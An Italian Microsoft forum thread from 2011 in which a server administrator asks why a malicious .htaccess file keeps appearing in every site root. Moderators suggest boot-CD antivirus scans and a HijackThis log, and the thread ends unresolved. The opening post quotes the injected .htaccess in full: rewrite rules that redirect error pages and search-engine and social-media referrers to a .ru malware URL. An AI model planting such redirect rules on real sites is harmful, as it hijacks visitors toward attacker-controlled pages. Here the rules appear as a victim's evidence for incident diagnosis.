none
Virus .htaccess RRS feed

  • Discussione generale

  • Ciao a tutti, ho un problema strano su una macchina windows 2008 web server, in pratica si crea automaticamente un file .htaccess in ogni cartella root dei siti ospitati. Facendo una scansione con un antivirus (AVG) ha rilevato dei worm in un sito realizzato con Zencart. Sistemato questo sito (aggiornandolo all’ultima versione di Zen, cambiato i dati di acesso etc), il problema non si è risolto, ogni 2/3 giorni compare quel maledetto file .htaccess (di cui copio il contenuto sotto, ma varia ogni volta), sempre e solo nella root, come cacchio fa? L'antivirus non trova nulla di strano, i vari settaggi sono apposto e non so piu' dove cercare, qualcuno può aiutarmi?

     

    RewriteEngine On ErrorDocument

    400 http://restileyear.ru/in.cgi?16 ErrorDocument01 http://restileyear.ru/in.cgi?16 ErrorDocument 403 http://restileyear.ru/in.cgi?16 ErrorDocument 404 http://restileyear.ru/in.cgi?16 ErrorDocument 500 http://restileyear.ru/in.cgi?16 RewriteCond %{HTTP_REFERER} .*google.* [OR] RewriteCond %{HTTP_REFERER} .*ask.* [OR] RewriteCond %{HTTP_REFERER} .*yahoo.* [OR] RewriteCond %{HTTP_REFERER} .*baidu.* [OR] RewriteCond %{HTTP_REFERER} .*youtube.* [OR] RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR] RewriteCond %{HTTP_REFERER} .*qq.* [OR] RewriteCond %{HTTP_REFERER} .*excite.* [OR] RewriteCond %{HTTP_REFERER} .*altavista.* [OR] RewriteCond %{HTTP_REFERER} .*msn.* [OR] RewriteCond %{HTTP_REFERER} .*netscape.* [OR] RewriteCond %{HTTP_REFERER} .*aol.* [OR] RewriteCond %{HTTP_REFERER} .*hotbot.* [OR] RewriteCond %{HTTP_REFERER} .*goto.* [OR] RewriteCond %{HTTP_REFERER} .*infoseek.* [OR] RewriteCond %{HTTP_REFERER} .*mamma.* [OR] RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR] RewriteCond %{HTTP_REFERER} .*lycos.* [OR] RewriteCond %{HTTP_REFERER} .*search.* [OR] RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR] RewriteCond %{HTTP_REFERER} .*bing.* [OR] RewriteCond %{HTTP_REFERER} .*dogpile.* [OR] RewriteCond %{HTTP_REFERER} .*facebook.* [OR] RewriteCond %{HTTP_REFERER} .*twitter.* [OR] RewriteCond %{HTTP_REFERER} .*blog.* [OR] RewriteCond %{HTTP_REFERER} .*live.* [OR] RewriteCond %{HTTP_REFERER} .*myspace.* [OR] RewriteCond %{HTTP_REFERER} .*mail.* [OR] RewriteCond %{HTTP_REFERER} .*yandex.* [OR] RewriteCond %{HTTP_REFERER} .*rambler.* [OR] RewriteCond %{HTTP_REFERER} .*ya.* [OR] RewriteCond %{HTTP_REFERER} .*aport.* [OR] RewriteCond %{HTTP_REFERER} .*linkedin.* [OR] RewriteCond %{HTTP_REFERER} .*flickr.* RewriteRule ^(.*)$ http://restileyear.ru/in.cgi?16 [R=301,L]

    • Tipo modificato Fabrizio Volpe martedì 15 febbraio 2011 11:06 Mancato feedback utente
    giovedì 20 gennaio 2011 09:20

Tutte le risposte

  • scarica questo

    http://www.avira.com/en/support-download-avira-antivir-rescue-system

    masterizzalo, fai il boot del server con questo dvd ed esegui una scansione completa.

    ciao.


    Edoardo Benussi - Microsoft® MVP
    Management Infrastructure - Systems Administration
    https://mvp.support.microsoft.com/Profile/Benussi
    Windows Server Italian Forum Moderator
    edo[at]mvps[dot]org
    giovedì 20 gennaio 2011 16:37
    Moderatore
  • scarica questo

    http://www.avira.com/en/support-download-avira-antivir-rescue-system

    masterizzalo, fai il boot del server con questo dvd ed esegui una
    scansione completa.

    Aggiungo (per buona misura, non perchè il CD di cui sopra non
    vada bene)

    http://www.f-secure.com/en_EMEA-Labs/security-threats/tools/rescue-cd/

    le istruzioni sono le stesse (masterizza, boot...) cambiano invece
    il motore di scansione e le firme (F-Secure); di nuovo, non che il
    CD di Avira non funzioni, ma a volte un "secondo parere" non fa
    male :)

    giovedì 20 gennaio 2011 17:49
  • Grazie per le risposte, domani provo prima con Avira e se il caso con F-secure.

    Speriamo che trovano qualcosa perchè Avg non vede nulla.

    Vi farò sapere... 

    giovedì 20 gennaio 2011 18:44
  • Grazie per le risposte, domani provo prima con
    Avira e se il caso con F-secure.

    Speriamo che trovano qualcosa perchè Avg
    non vede nulla.

    A prescindere da giudizi su AVG o altro, di norma la
    prima cosa che fa un malware è quella di nascondersi
    a qualsivoglia AV in esecuzione sul sistema, questo
    significa che, tentare di pulire un sistema infetto ... dal
    sistema stesso è, spesso, del tutto inutile e non porta
    ad alcun risultato; in questi casi è MOLTO meglio usare
    un boot CD (come ad esempio quelli consigliati) per
    avviare il sistema lasciando l'OS infetto "dormiente"
    ed in tal modo essere in grado di effettuare una reale
    scansione (e pulizia) dello stesso

    ciao

    venerdì 21 gennaio 2011 08:03
  • Purtroppo ho provato a fare una scansione completa con Avira facendo un boot da CD, ma non ha trovato nulla di strano come immaginavo, è un po' difficile trovare un virus "Vero" in un server web, ma andando ad esclusione questo tentativo andava fatto.

    Praticamente il problema è partito quasi sicuramente da quella versione di Zencart non aggiornata, (era un noto bug che è stato sfruttato dove l'attaccante ha creato delle backdoor tipo ghdd.php nella cartella immagine di tale sito), oppure qualche accesso FTP rubato (difficile perché le password sono abbastanza robuste) , oppure qualche computer infetto di chi si collegava via FTP al suo sito.

    Presi tutti i provvedimenti del caso, cioè aggiornato Zen, cambiare password FTP dei siti sospetti etc. non so cosa altro pensare, come fa a scrivere quel file nelle root dei siti, soprattutto a tutti i siti ? Per ora ho eliminato i permessi di scrittura all'utente users (aveva permessi di scrittura nella Autorizzazioni speciali in tutta la cartella dove sono i siti).

    Se la mia teoria è giusta, il sito o i siti infettati, ora che non ci sono piu' i permessi di scrittura, dovrebbero poter scrivere solo dove hanno i dati di accesso e non a tutti, in tal caso sarebbe fatta perché, se si crea il file sospetto solo in un sito allora è sicuro che è quello il problema.

    Ovviamente se avete suggerimenti sono piu' che graditi... 

     

     

    venerdì 21 gennaio 2011 21:50
  • puoi mandarmi alla casella mail in firma il log di hijackthis ?
    Edoardo Benussi - Microsoft® MVP
    Management Infrastructure - Systems Administration
    https://mvp.support.microsoft.com/Profile/Benussi
    Windows Server Italian Forum Moderator
    edo[at]mvps[dot]org
    domenica 23 gennaio 2011 09:55
    Moderatore
  • ho visto il log ma in quello non viene segnalato nulla.

    mi puoi dire cosa c'è nei siti web pubblicati da questo web server ? siti scritti con quale tecnologia ?


    Edoardo Benussi - Microsoft® MVP
    Management Infrastructure - Systems Administration
    https://mvp.support.microsoft.com/Profile/Benussi
    Windows Server Italian Forum Moderator
    edo[at]mvps[dot]org
    lunedì 24 gennaio 2011 07:39
    Moderatore
  • Ho modificato questo thread in "Discussione" visti i tempi trascorsi.

    Restiamo a disposizione se il problema fosse ancora non risolto o per conoscere la soluzione eventualmente applicata.


    Fabrizio Volpe
    MVP Directory Services
    MCSE (NT4)(2000)(2003) - MCSA (2003)
    MCTS (SQL 2005)(Exchange 2007)(Windows 2008)
    Fortinet Certified Network Security Professional (FCNSP)
    Fabrizio[_dot_]Volpe[_at_]GMX[_dot_]com
    martedì 15 febbraio 2011 11:06